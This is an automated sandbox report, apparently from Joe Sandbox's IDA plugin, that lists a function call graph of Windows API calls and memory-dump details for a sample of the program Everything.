28820 7ff63d5ed580 Concurrency::details::SchedulerBase::Create 103 API calls 28821 7ff63d53e3d8 28820->28821 28822 7ff63d5ed580 Concurrency::details::SchedulerBase::Create 103 API calls 28821->28822 28823 7ff63d53e3e2 28822->28823 28824 7ff63d5ed580 Concurrency::details::SchedulerBase::Create 103 API calls 28823->28824 28824->28804 28825->28718 28826->28718 28827->28726 28828->28720 28829->28722 28830->28728 28831->28728 28832->28734 28833->28734 28834->28739 28835->28739 28836->28744 28837->28744 28838->28748 28839->28748 28840->28754 28841->28754 28842->28756 28843->28758 28844->28760 28845->28760 28846->28760 28847->28771 28848->28779 28849->28760 28850->28775 28851->28775 28852->28775 28853->28775 28854->28780 28855->28791 28856->28793 28858 7ff63d547a25 Concurrency::details::SchedulerBase::Create 28857->28858 28913 7ff63d5ed850 28858->28913 28860 7ff63d547a5c 28861 7ff63d547a69 28860->28861 28862 7ff63d547a73 28860->28862 28863 7ff63d5ed850 Concurrency::details::SchedulerBase::Create 103 API calls 28861->28863 28864 7ff63d5e7a90 103 API calls 28862->28864 28865 7ff63d547a71 28863->28865 28864->28865 28866 7ff63d547a8f 28865->28866 28867 7ff63d547a85 28865->28867 28869 7ff63d5e7a90 103 API calls 28866->28869 28868 7ff63d5ed850 Concurrency::details::SchedulerBase::Create 103 API calls 28867->28868 28870 7ff63d547a8d 28868->28870 28869->28870 28871 7ff63d547aab 28870->28871 28872 7ff63d547aa1 28870->28872 28874 7ff63d5e7a90 103 API calls 28871->28874 28873 7ff63d5ed850 Concurrency::details::SchedulerBase::Create 103 API calls 28872->28873 28875 7ff63d547aa9 28873->28875 28874->28875 28876 7ff63d545f20 106 API calls 28875->28876 28877 7ff63d547aed 28876->28877 28878 7ff63d547b02 SystemParametersInfoW 28877->28878 28879 7ff63d547af2 GetWindowRect 28877->28879 28880 7ff63d547b15 Concurrency::details::SchedulerBase::Create 28878->28880 28879->28880 28881 7ff63d5ed850 Concurrency::details::SchedulerBase::Create 103 API calls 28880->28881 28882 7ff63d547b6e 28881->28882 28883 7ff63d5ed850 Concurrency::details::SchedulerBase::Create 103 API calls 28882->28883 28884 7ff63d547b82 CreateWindowExW 28883->28884 28885 7ff63d5ed580 Concurrency::details::SchedulerBase::Create 103 API calls 28884->28885 28886 7ff63d547bd9 28885->28886 28887 7ff63d5ed580 Concurrency::details::SchedulerBase::Create 103 API calls 28886->28887 28888 7ff63d547be6 Concurrency::details::SchedulerBase::Create 28887->28888 28889 7ff63d547bf6 SetForegroundWindow SetWindowPos 28888->28889 28890 7ff63d523fb0 Concurrency::details::SchedulerBase::Create 103 API calls 28889->28890 28891 7ff63d547c90 ShellExecuteExW 28890->28891 28892 7ff63d523fb0 Concurrency::details::SchedulerBase::Create 103 API calls 28891->28892 28893 7ff63d547ca9 DestroyWindow 28892->28893 28894 7ff63d547cb6 28893->28894 28895 7ff63d547ce0 GetLastError 28893->28895 28897 7ff63d547cfd 28894->28897 28899 7ff63d547cc7 WaitForSingleObject CloseHandle 28894->28899 28896 7ff63d523fe0 Concurrency::details::SchedulerBase::Create 103 API calls 28895->28896 28896->28897 28898 7ff63d5ed580 Concurrency::details::SchedulerBase::Create 103 API calls 28897->28898 28900 7ff63d547d0a 28898->28900 28899->28897 28901 7ff63d5ed580 Concurrency::details::SchedulerBase::Create 103 API calls 28900->28901 28902 7ff63d547d17 28901->28902 28903 7ff63d5ed580 Concurrency::details::SchedulerBase::Create 103 API calls 28902->28903 28904 7ff63d547d24 28903->28904 28905 7ff63d5ed580 Concurrency::details::SchedulerBase::Create 103 API calls 28904->28905 28906 7ff63d547d31 28905->28906 28907 7ff63d618fb0 Concurrency::details::SchedulerBase::Create 8 API calls 28906->28907 28908 7ff63d53e3c6 28907->28908 28908->28820 28909->28804 28910->28809 28911->28814 28912->28815 28914 7ff63d5ed86d Concurrency::details::SchedulerBase::Create 28913->28914 28915 7ff63d53f780 Concurrency::details::SchedulerBase::Create 103 API calls 28914->28915 28916 7ff63d5ed889 28914->28916 28917 7ff63d5ed8a7 28914->28917 28915->28916 28916->28917 28918 7ff63d53f700 Concurrency::details::SchedulerBase::Create 103 API calls 28916->28918 28918->28917 29481 7ff63d61f130 63 API calls Concurrency::details::SchedulerBase::Create 29339 7ff63d473f10 128 API calls Concurrency::details::SchedulerBase::Create 29482 7ff63d475910 113 API calls Concurrency::details::SchedulerBase::Create 29486 7ff63d48a100 258 API calls Concurrency::details::SchedulerBase::Create 29343 7ff63d476f04 119 API calls Concurrency::details::SchedulerBase::Create 29489 7ff63d485100 106 API calls Concurrency::details::SchedulerBase::Create 29347 7ff63d489f30 192 API calls Concurrency::details::SchedulerBase::Create 29497 7ff63d4c7920 124 API calls Concurrency::details::SchedulerBase::Create 29356 7ff63d487320 152 API calls Concurrency::details::SchedulerBase::Create 29502 7ff63d619cf0 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 29360 7ff63d549ee0 104 API calls Concurrency::details::SchedulerBase::Create 29506 7ff63d48a4c0 211 API calls Concurrency::details::SchedulerBase::Create 29365 7ff63d4712c0 106 API calls Concurrency::details::SchedulerBase::Create 29509 7ff63d4808c0 136 API calls 29513 7ff63d4828f0 GetCurrentThread SetThreadPriority 29375 7ff63d5236d0 122 API calls Concurrency::details::SchedulerBase::Create 29517 7ff63d5244d0 13 API calls Concurrency::details::SchedulerBase::Create 29524 7ff63d476780 111 API calls Concurrency::details::SchedulerBase::Create 29526 7ff63d47d380 133 API calls Concurrency::details::SchedulerBase::Create 29385 7ff63d480db0 151 API calls 29239 7ff63d54fd80 29240 7ff63d54fdaa EnterCriticalSection 29239->29240 29241 7ff63d54fd9e 29239->29241 29243 7ff63d54fe32 LeaveCriticalSection 29240->29243 29244 7ff63d54fdc3 LeaveCriticalSection SetThreadPriority ResetEvent SetEvent 29240->29244 29242 7ff63d523fb0 Concurrency::details::SchedulerBase::Create 103 API calls 29241->29242 29242->29240 29245 7ff63d523fe0 Concurrency::details::SchedulerBase::Create 103 API calls 29243->29245 29248 7ff63d54fe1f 29244->29248 29247 7ff63d54fe57 29245->29247 29249 7ff63d53f700 Concurrency::details::SchedulerBase::Create 103 API calls 29247->29249 29250 7ff63d54fe61 CreateEventW 29249->29250 29251 7ff63d54fead CreateEventW 29250->29251 29252 7ff63d54fe83 GetLastError 29250->29252 29254 7ff63d54fec8 GetLastError 29251->29254 29255 7ff63d54fef1 29251->29255 29253 7ff63d524180 Concurrency::details::SchedulerBase::Create 103 API calls 29252->29253 29257 7ff63d54feac 29253->29257 29258 7ff63d524180 Concurrency::details::SchedulerBase::Create 103 API calls 29254->29258 29285 7ff63d6195f0 29255->29285 29257->29251 29258->29255 29260 7ff63d54ff39 GetLastError 29261 7ff63d524180 Concurrency::details::SchedulerBase::Create 103 API calls 29260->29261 29262 7ff63d54ff67 Concurrency::details::SchedulerBase::Create 29261->29262 29278 7ff63d54ffe6 29262->29278 29308 7ff63d5ed5a0 103 API calls Concurrency::details::SchedulerBase::Create 29262->29308 29263 7ff63d550020 29266 7ff63d5ed580 Concurrency::details::SchedulerBase::Create 103 API calls 29263->29266 29265 7ff63d54fff0 GetSystemDirectoryW 29265->29263 29265->29278 29267 7ff63d550043 29266->29267 29268 7ff63d550085 29267->29268 29304 7ff63d5e88b0 29267->29304 29271 7ff63d5ed580 Concurrency::details::SchedulerBase::Create 103 API calls 29268->29271 29269 7ff63d550022 29272 7ff63d5e8050 Concurrency::details::SchedulerBase::Create 103 API calls 29269->29272 29274 7ff63d550092 29271->29274 29272->29263 29277 7ff63d5ed580 Concurrency::details::SchedulerBase::Create 103 API calls 29274->29277 29276 7ff63d5ee2f0 Concurrency::details::SchedulerBase::Create 103 API calls 29279 7ff63d550074 LoadLibraryExW 29276->29279 29280 7ff63d55009f 29277->29280 29278->29263 29278->29265 29278->29269 29309 7ff63d5ed5a0 103 API calls Concurrency::details::SchedulerBase::Create 29278->29309 29279->29268 29281 7ff63d5ed580 Concurrency::details::SchedulerBase::Create 103 API calls 29280->29281 29282 7ff63d5500ac 29281->29282 29283 7ff63d618fb0 Concurrency::details::SchedulerBase::Create 8 API calls 29282->29283 29284 7ff63d5500bf 29283->29284 29286 7ff63d619616 29285->29286 29287 7ff63d61963c Concurrency::details::SchedulerBase::Create 29285->29287 29310 7ff63d61ae50 58 API calls _lock 29286->29310 29312 7ff63d61af80 58 API calls Concurrency::details::SchedulerBase::Create 29287->29312 29289 7ff63d61961b 29311 7ff63d61b150 58 API calls 2 library calls 29289->29311 29292 7ff63d619635 29294 7ff63d54ff2c 29292->29294 29293 7ff63d619655 29295 7ff63d6196c8 29293->29295 29313 7ff63d61a340 63 API calls 2 library calls 29293->29313 29294->29248 29294->29260 29315 7ff63d6197d0 58 API calls _lock 29295->29315 29298 7ff63d619662 29314 7ff63d61a120 58 API calls 2 library calls 29298->29314 29300 7ff63d6196d0 29300->29292 29316 7ff63d61ae80 58 API calls _lock 29300->29316 29302 7ff63d619671 CreateThread 29302->29292 29303 7ff63d6196c0 GetLastError 29302->29303 29303->29295 29305 7ff63d5e88c0 29304->29305 29305->29305 29306 7ff63d5e87a0 Concurrency::details::SchedulerBase::Create 103 API calls 29305->29306 29307 7ff63d55005f 29306->29307 29307->29276 29308->29278 29309->29278 29310->29289 29311->29292 29312->29293 29313->29298 29314->29302 29315->29300 29316->29292 29528 7ff63d548f80 107 API calls Concurrency::details::SchedulerBase::Create 29530 7ff63d4743a0 116 API calls Concurrency::details::SchedulerBase::Create 29398 7ff63d476d54 106 API calls Concurrency::details::SchedulerBase::Create 29402 7ff63d482940 295 API calls Concurrency::details::SchedulerBase::Create 29537 7ff63d482740 182 API calls Concurrency::details::SchedulerBase::Create 29405 7ff63d489574 349 API calls Concurrency::details::SchedulerBase::Create 29540 7ff63d523750 117 API calls 29411 7ff63d475560 PostThreadMessageW 29544 7ff63d480b60 109 API calls 29545 7ff63d553350 124 API calls Concurrency::details::SchedulerBase::Create 29417 7ff63d472a10 103 API calls Concurrency::details::SchedulerBase::Create 28976 7ff63d47cc10 28977 7ff63d47cc37 28976->28977 28979 7ff63d47cc5e Concurrency::details::SchedulerBase::Create 28976->28979 28978 7ff63d47b7b0 144 API calls 28977->28978 28980 7ff63d47cc46 28978->28980 28991 7ff63d5eb090 28979->28991 28981 7ff63d618fb0 Concurrency::details::SchedulerBase::Create 8 API calls 28980->28981 28983 7ff63d47cc56 28981->28983 28987 7ff63d5ed580 Concurrency::details::SchedulerBase::Create 103 API calls 28988 7ff63d47cc9c 28987->28988 28989 7ff63d618fb0 Concurrency::details::SchedulerBase::Create 8 API calls 28988->28989 28990 7ff63d47ccac 28989->28990 29085 7ff63d5eaed0 28991->29085 28996 7ff63d5eb10f 28998 7ff63d5eb123 28996->28998 28999 7ff63d53f780 Concurrency::details::SchedulerBase::Create 103 API calls 28996->28999 28997 7ff63d53f780 Concurrency::details::SchedulerBase::Create 103 API calls 28997->28996 29000 7ff63d618fb0 Concurrency::details::SchedulerBase::Create 8 API calls 28998->29000 28999->28998 29001 7ff63d47cc80 29000->29001 29002 7ff63d47b7b0 29001->29002 29194 7ff63d5e5de0 29002->29194 29005 7ff63d47b7f9 29211 7ff63d539340 124 API calls Concurrency::details::SchedulerBase::Create 29005->29211 29006 7ff63d47cbb6 GetLastError 29008 7ff63d523fe0 Concurrency::details::SchedulerBase::Create 103 API calls 29006->29008 29080 7ff63d47b955 29008->29080 29009 7ff63d47b808 29011 7ff63d47cb96 29009->29011 29017 7ff63d47b819 29009->29017 29010 7ff63d618fb0 Concurrency::details::SchedulerBase::Create 8 API calls 29012 7ff63d47cbe5 29010->29012 29234 7ff63d523fe0 29011->29234 29012->28987 29015 7ff63d53f780 Concurrency::details::SchedulerBase::Create 103 API calls 29015->29080 29016 7ff63d47b95a Concurrency::details::SchedulerBase::Create 29020 7ff63d47b991 29016->29020 29214 7ff63d5e68b0 103 API calls Concurrency::details::SchedulerBase::Create 29016->29214 29017->29016 29019 7ff63d47b8ed Concurrency::details::SchedulerBase::Create 29017->29019 29212 7ff63d5ec590 113 API calls Concurrency::details::SchedulerBase::Create 29019->29212 29024 7ff63d47b9c2 29020->29024 29215 7ff63d5e68b0 103 API calls Concurrency::details::SchedulerBase::Create 29020->29215 29023 7ff63d47b91c 29025 7ff63d47b7b0 143 API calls 29023->29025 29028 7ff63d47b9f3 29024->29028 29216 7ff63d5e68b0 103 API calls Concurrency::details::SchedulerBase::Create 29024->29216 29027 7ff63d47b92e 29025->29027 29029 7ff63d5ed580 Concurrency::details::SchedulerBase::Create 103 API calls 29027->29029 29033 7ff63d47ba24 29028->29033 29217 7ff63d5e68b0 103 API calls Concurrency::details::SchedulerBase::Create 29028->29217 29031 7ff63d47b93b 29029->29031 29213 7ff63d539200 103 API calls Concurrency::details::SchedulerBase::Create 29031->29213 29037 7ff63d47ba55 29033->29037 29218 7ff63d5e68b0 103 API calls Concurrency::details::SchedulerBase::Create 29033->29218 29040 7ff63d47baba 29037->29040 29219 7ff63d5e68b0 103 API calls Concurrency::details::SchedulerBase::Create 29037->29219 29039 7ff63d5e89a0 103 API calls Concurrency::details::SchedulerBase::Create 29039->29040 29040->29039 29041 7ff63d47bbe5 29040->29041 29220 7ff63d4798f0 103 API calls Concurrency::details::SchedulerBase::Create 29041->29220 29043 7ff63d47c056 29221 7ff63d479c50 103 API calls Concurrency::details::SchedulerBase::Create 29043->29221 29045 7ff63d47c137 Concurrency::details::SchedulerBase::Create 29222 7ff63d5ea160 103 API calls Concurrency::details::SchedulerBase::Create 29045->29222 29047 7ff63d47c1ee 29048 7ff63d5ed580 Concurrency::details::SchedulerBase::Create 103 API calls 29047->29048 29052 7ff63d47c1fb Concurrency::details::SchedulerBase::Create 29048->29052 29049 7ff63d53f700 Concurrency::details::SchedulerBase::Create 103 API calls 29051 7ff63d47c16f 29049->29051 29051->29047 29051->29049 29223 7ff63d5ddcf0 103 API calls Concurrency::details::SchedulerBase::Create 29051->29223 29224 7ff63d5ea160 103 API calls Concurrency::details::SchedulerBase::Create 29051->29224 29225 7ff63d5ea160 103 API calls Concurrency::details::SchedulerBase::Create 29052->29225 29055 7ff63d47c30d 29056 7ff63d5ed580 Concurrency::details::SchedulerBase::Create 103 API calls 29055->29056 29062 7ff63d47c31a 29056->29062 29059 7ff63d53f700 Concurrency::details::SchedulerBase::Create 103 API calls 29061 7ff63d47c24f 29059->29061 29061->29055 29061->29059 29226 7ff63d5e5510 103 API calls Concurrency::details::SchedulerBase::Create 29061->29226 29227 7ff63d5ddcf0 103 API calls Concurrency::details::SchedulerBase::Create 29061->29227 29228 7ff63d5ea160 103 API calls Concurrency::details::SchedulerBase::Create 29061->29228 29229 7ff63d479fb0 103 API calls Concurrency::details::SchedulerBase::Create 29062->29229 29064 7ff63d47c45d 29230 7ff63d47a270 103 API calls Concurrency::details::SchedulerBase::Create 29064->29230 29066 7ff63d47c4d4 29231 7ff63d47a4c0 103 API calls Concurrency::details::SchedulerBase::Create 29066->29231 29069 7ff63d5e89a0 103 API calls Concurrency::details::SchedulerBase::Create 29070 7ff63d47c50e 29069->29070 29070->29069 29072 7ff63d47c5ce 29070->29072 29232 7ff63d5e68b0 103 API calls Concurrency::details::SchedulerBase::Create 29070->29232 29071 7ff63d5e89a0 103 API calls Concurrency::details::SchedulerBase::Create 29071->29072 29072->29071 29084 7ff63d47c852 29072->29084 29073 7ff63d47cb68 29074 7ff63d5ed580 Concurrency::details::SchedulerBase::Create 103 API calls 29073->29074 29075 7ff63d47cb75 29074->29075 29233 7ff63d539200 103 API calls Concurrency::details::SchedulerBase::Create 29075->29233 29079 7ff63d5e89a0 103 API calls Concurrency::details::SchedulerBase::Create 29079->29084 29080->29010 29081 7ff63d5ea160 103 API calls 29081->29084 29082 7ff63d53f780 103 API calls Concurrency::details::SchedulerBase::Create 29082->29084 29083 7ff63d53f700 Concurrency::details::SchedulerBase::Create 103 API calls 29083->29084 29084->29073 29084->29079 29084->29081 29084->29082 29084->29083 29086 7ff63d5eaf01 29085->29086 29087 7ff63d5eaf26 29086->29087 29088 7ff63d53f780 Concurrency::details::SchedulerBase::Create 103 API calls 29086->29088 29089 7ff63d5eaf42 29086->29089 29087->29089 29090 7ff63d53f700 Concurrency::details::SchedulerBase::Create 103 API calls 29087->29090 29088->29087 29097 7ff63d5eafb9 29089->29097 29141 7ff63d5eadc0 103 API calls Concurrency::details::SchedulerBase::Create 29089->29141 29090->29089 29092 7ff63d5eaf91 29142 7ff63d5e8bf0 103 API calls Concurrency::details::SchedulerBase::Create 29092->29142 29094 7ff63d618fb0 Concurrency::details::SchedulerBase::Create 8 API calls 29095 7ff63d5eb074 29094->29095 29103 7ff63d5e92d0 29095->29103 29096 7ff63d5eafa5 29096->29097 29098 7ff63d53f780 Concurrency::details::SchedulerBase::Create 103 API calls 29096->29098 29099 7ff63d53f700 Concurrency::details::SchedulerBase::Create 103 API calls 29097->29099 29100 7ff63d5eb005 Concurrency::details::SchedulerBase::Create 29097->29100 29101 7ff63d5eb034 Concurrency::details::SchedulerBase::Create 29097->29101 29098->29097 29099->29100 29100->29101 29102 7ff63d53f780 Concurrency::details::SchedulerBase::Create 103 API calls 29100->29102 29101->29094 29102->29101 29143 7ff63d550780 29103->29143 29106 7ff63d5e94be 29108 7ff63d5e953c 29106->29108 29115 7ff63d5e94c3 29106->29115 29107 7ff63d5e9338 29110 7ff63d5e93b4 29107->29110 29111 7ff63d5e9341 29107->29111 29181 7ff63d5e9130 106 API calls Concurrency::details::SchedulerBase::Create 29108->29181 29112 7ff63d5e9434 29110->29112 29113 7ff63d5e93c1 29110->29113 29120 7ff63d5e936a 29111->29120 29125 7ff63d53f780 Concurrency::details::SchedulerBase::Create 103 API calls 29111->29125 29126 7ff63d5e9386 29111->29126 29179 7ff63d5e9130 106 API calls Concurrency::details::SchedulerBase::Create 29112->29179 29117 7ff63d5e93d8 29113->29117 29118 7ff63d5e93e7 29113->29118 29114 7ff63d5e94f5 29124 7ff63d53f700 Concurrency::details::SchedulerBase::Create 103 API calls 29114->29124 29114->29126 29115->29114 29119 7ff63d53f780 Concurrency::details::SchedulerBase::Create 103 API calls 29115->29119 29115->29126 29172 7ff63d5e9130 106 API calls Concurrency::details::SchedulerBase::Create 29117->29172 29173 7ff63d5e87a0 29118->29173 29119->29114 29120->29126 29130 7ff63d53f700 Concurrency::details::SchedulerBase::Create 103 API calls 29120->29130 29121 7ff63d5e9450 29134 7ff63d5e9455 29121->29134 29180 7ff63d5e9130 106 API calls Concurrency::details::SchedulerBase::Create 29121->29180 29122 7ff63d5e9586 29129 7ff63d618fb0 Concurrency::details::SchedulerBase::Create 8 API calls 29122->29129 29124->29126 29125->29120 29126->29122 29127 7ff63d53f780 Concurrency::details::SchedulerBase::Create 103 API calls 29126->29127 29127->29122 29128 7ff63d5e93e2 29128->29118 29132 7ff63d5e9596 29129->29132 29130->29126 29132->28996 29132->28997 29136 7ff63d5e87a0 Concurrency::details::SchedulerBase::Create 103 API calls 29134->29136 29135 7ff63d5e9417 29135->29126 29138 7ff63d53f780 Concurrency::details::SchedulerBase::Create 103 API calls 29135->29138 29137 7ff63d5e94a1 29136->29137 29137->29126 29139 7ff63d53f780 Concurrency::details::SchedulerBase::Create 103 API calls 29137->29139 29138->29126 29140 7ff63d5e94b9 29139->29140 29140->29126 29141->29092 29142->29096 29144 7ff63d5507af Concurrency::details::SchedulerBase::Create 29143->29144 29145 7ff63d5507d5 29144->29145 29146 7ff63d5507e1 29144->29146 29182 7ff63d5e7fb0 103 API calls Concurrency::details::SchedulerBase::Create 29145->29182 29183 7ff63d5505f0 105 API calls Concurrency::details::SchedulerBase::Create 29146->29183 29149 7ff63d5507df 29154 7ff63d5ed850 Concurrency::details::SchedulerBase::Create 103 API calls 29149->29154 29150 7ff63d5507e8 29151 7ff63d5507ff 29150->29151 29184 7ff63d5e7290 103 API calls Concurrency::details::SchedulerBase::Create 29150->29184 29185 7ff63d5505f0 105 API calls Concurrency::details::SchedulerBase::Create 29151->29185 29155 7ff63d55081e ExpandEnvironmentStringsW 29154->29155 29156 7ff63d55087e 29155->29156 29157 7ff63d550840 29155->29157 29187 7ff63d5e7fb0 103 API calls Concurrency::details::SchedulerBase::Create 29156->29187 29159 7ff63d5508d0 29157->29159 29186 7ff63d5ed5a0 103 API calls Concurrency::details::SchedulerBase::Create 29157->29186 29188 7ff63d5e8050 29159->29188 29160 7ff63d55088b 29163 7ff63d5ed580 Concurrency::details::SchedulerBase::Create 103 API calls 29160->29163 29165 7ff63d550898 29163->29165 29164 7ff63d55085c ExpandEnvironmentStringsW 29164->29156 29164->29157 29166 7ff63d5ed580 Concurrency::details::SchedulerBase::Create 103 API calls 29165->29166 29167 7ff63d5508a5 29166->29167 29168 7ff63d5ed580 Concurrency::details::SchedulerBase::Create 103 API calls 29167->29168 29169 7ff63d5508af 29168->29169 29170 7ff63d618fb0 Concurrency::details::SchedulerBase::Create 8 API calls 29169->29170 29171 7ff63d5508bf 29170->29171 29171->29106 29171->29107 29172->29128 29174 7ff63d5e87cb 29173->29174 29175 7ff63d5e87fb 29174->29175 29176 7ff63d53f780 Concurrency::details::SchedulerBase::Create 103 API calls 29174->29176 29178 7ff63d5e8817 Concurrency::details::SchedulerBase::Create 29174->29178 29177 7ff63d53f700 Concurrency::details::SchedulerBase::Create 103 API calls 29175->29177 29175->29178 29176->29175 29177->29178 29178->29135 29179->29121 29180->29134 29181->29126 29182->29149 29183->29150 29184->29151 29185->29149 29186->29164 29187->29160 29189 7ff63d5e806d Concurrency::details::SchedulerBase::Create 29188->29189 29190 7ff63d5e8089 29189->29190 29191 7ff63d53f780 Concurrency::details::SchedulerBase::Create 103 API calls 29189->29191 29193 7ff63d5e80a5 29189->29193 29192 7ff63d53f700 Concurrency::details::SchedulerBase::Create 103 API calls 29190->29192 29190->29193 29191->29190 29192->29193 29195 7ff63d545550 106 API calls 29194->29195 29196 7ff63d5e5df4 29195->29196 29197 7ff63d47b7e8 29196->29197 29237 7ff63d5476d0 GetFileSize GetLastError 29196->29237 29197->29005 29197->29006 29199 7ff63d5e5e0e 29200 7ff63d5e5eaa CloseHandle 29199->29200 29201 7ff63d5e5e25 29199->29201 29202 7ff63d5e5e6d 29199->29202 29200->29197 29203 7ff63d5e5e2e 29201->29203 29205 7ff63d5e5e55 Concurrency::details::SchedulerBase::Create 29201->29205 29204 7ff63d53f700 Concurrency::details::SchedulerBase::Create 103 API calls 29202->29204 29203->29205 29238 7ff63d53f750 GetProcessHeap HeapAlloc 29203->29238 29204->29205 29205->29200 29211->29009 29212->29023 29214->29020 29215->29024 29216->29028 29217->29033 29218->29037 29219->29037 29220->29043 29221->29045 29222->29051 29223->29051 29224->29051 29225->29061 29226->29061 29227->29061 29228->29061 29229->29064 29230->29066 29231->29070 29232->29070 29235 7ff63d523b10 Concurrency::details::SchedulerBase::Create 103 API calls 29234->29235 29236 7ff63d47cba7 29235->29236 29236->29015 29237->29199 29420 7ff63d4781a0 WriteFile 29423 7ff63d4781a0 104 API calls 29551 7ff63d487000 152 API calls Concurrency::details::SchedulerBase::Create 29431 7ff63d475a30 135 API calls Concurrency::details::SchedulerBase::Create 29557 7ff63d471030 104 API calls Concurrency::details::SchedulerBase::Create 29433 7ff63d486a30 239 API calls Concurrency::details::SchedulerBase::Create 29558 7ff63d486c30 166 API calls Concurrency::details::SchedulerBase::Create 29560 7ff63d489820 368 API calls Concurrency::details::SchedulerBase::Create 29438 7ff63d475622 SetServiceStatus 28919 7ff63d524010 28920 7ff63d524033 Concurrency::details::SchedulerBase::Create 28919->28920 28947 7ff63d5ea4c0 28920->28947 28923 7ff63d523fb0 Concurrency::details::SchedulerBase::Create 103 API calls 28924 7ff63d524049 28923->28924 28925 7ff63d523fb0 Concurrency::details::SchedulerBase::Create 103 API calls 28924->28925 28926 7ff63d52405a 28925->28926 28927 7ff63d523fb0 Concurrency::details::SchedulerBase::Create 103 API calls 28926->28927 28928 7ff63d52408d 28927->28928 28929 7ff63d523fb0 Concurrency::details::SchedulerBase::Create 103 API calls 28928->28929 28930 7ff63d52409f 28929->28930 28931 7ff63d54b310 SHTestTokenMembership 28930->28931 28932 7ff63d5240a4 28931->28932 28933 7ff63d523fb0 Concurrency::details::SchedulerBase::Create 103 API calls 28932->28933 28934 7ff63d5240b2 28933->28934 28935 7ff63d523fb0 Concurrency::details::SchedulerBase::Create 103 API calls 28934->28935 28936 7ff63d5240c5 28935->28936 28950 7ff63d5b4c90 OpenSCManagerW 28936->28950 28939 7ff63d523fb0 Concurrency::details::SchedulerBase::Create 103 API calls 28940 7ff63d5240d8 GetCommandLineW 28939->28940 28941 7ff63d523fb0 Concurrency::details::SchedulerBase::Create 103 API calls 28940->28941 28942 7ff63d5240ed 28941->28942 28943 7ff63d5ed580 Concurrency::details::SchedulerBase::Create 103 API calls 28942->28943 28944 7ff63d5240f7 28943->28944 28945 7ff63d618fb0 Concurrency::details::SchedulerBase::Create 8 API calls 28944->28945 28946 7ff63d524107 28945->28946 28948 7ff63d5e89a0 Concurrency::details::SchedulerBase::Create 103 API calls 28947->28948 28949 7ff63d52403d 28948->28949 28949->28923 28951 7ff63d5b4cc8 28950->28951 28952 7ff63d5b4e27 28950->28952 28974 7ff63d55ba30 103 API calls Concurrency::details::SchedulerBase::Create 28951->28974 28954 7ff63d618fb0 Concurrency::details::SchedulerBase::Create 8 API calls 28952->28954 28958 7ff63d5240ca 28954->28958 28955 7ff63d5b4ce5 OpenServiceW 28956 7ff63d5b4d09 QueryServiceStatusEx 28955->28956 28957 7ff63d5b4dfc GetLastError 28955->28957 28959 7ff63d5b4df1 CloseServiceHandle 28956->28959 28960 7ff63d5b4d2f 28956->28960 28961 7ff63d5b4e0a CloseServiceHandle 28957->28961 28958->28939 28959->28961 28960->28959 28962 7ff63d5b4d3a OpenServiceW 28960->28962 28961->28952 28963 7ff63d5b4d68 28962->28963 28964 7ff63d5b4de9 28962->28964 28965 7ff63d53f700 Concurrency::details::SchedulerBase::Create 103 API calls 28963->28965 28964->28959 28966 7ff63d5b4d7a QueryServiceConfigW 28965->28966 28967 7ff63d5b4dd0 28966->28967 28968 7ff63d5b4d98 Concurrency::details::SchedulerBase::Create 28966->28968 28969 7ff63d53f780 Concurrency::details::SchedulerBase::Create 103 API calls 28967->28969 28975 7ff63d55b930 105 API calls Concurrency::details::SchedulerBase::Create 28968->28975 28970 7ff63d5b4dd8 CloseServiceHandle 28969->28970 28970->28964 28972 7ff63d5b4db1 28973 7ff63d5ed580 Concurrency::details::SchedulerBase::Create 103 API calls 28972->28973 28973->28967 28974->28955 28975->28972 29562 7ff63d486020 358 API calls Concurrency::details::SchedulerBase::Create 29443 7ff63d4869d0 315 API calls Concurrency::details::SchedulerBase::Create 29571 7ff63d476bc0 105 API calls Concurrency::details::SchedulerBase::Create 29572 7ff63d47abed GetSysColor 29573 7ff63d601fc0 8 API calls 29574 7ff63d4773e7 112 API calls Concurrency::details::SchedulerBase::Create 29450 7ff63d5231c0 127 API calls Concurrency::details::SchedulerBase::Create 29454 7ff63d5239d0 178 API calls 29455 7ff63d4711e0 105 API calls Concurrency::details::SchedulerBase::Create 29579 7ff63d4807e0 123 API calls 29581 7ff63d486fe0 123 API calls Concurrency::details::SchedulerBase::Create
                                                                                                            APIs
                                                                                                              • Part of subcall function 00007FF63D5E5DE0: CloseHandle.KERNEL32(?,?,00000001,00007FF63D47B7E8), ref: 00007FF63D5E5EAD
                                                                                                            • GetLastError.KERNEL32 ref: 00007FF63D47CBB6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000006.00000002.2243039986.00007FF63D471000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF63D470000, based on PE: true
                                                                                                            • Associated: 00000006.00000002.2242965964.00007FF63D470000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D620000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243528124.00007FF63D64A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243722692.00007FF63D66C000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243801950.00007FF63D670000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243924981.00007FF63D671000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243948513.00007FF63D673000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2243976774.00007FF63D674000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244000249.00007FF63D67C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000006.00000002.2244022765.00007FF63D680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_6_2_7ff63d470000_Everything.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseErrorHandleLast
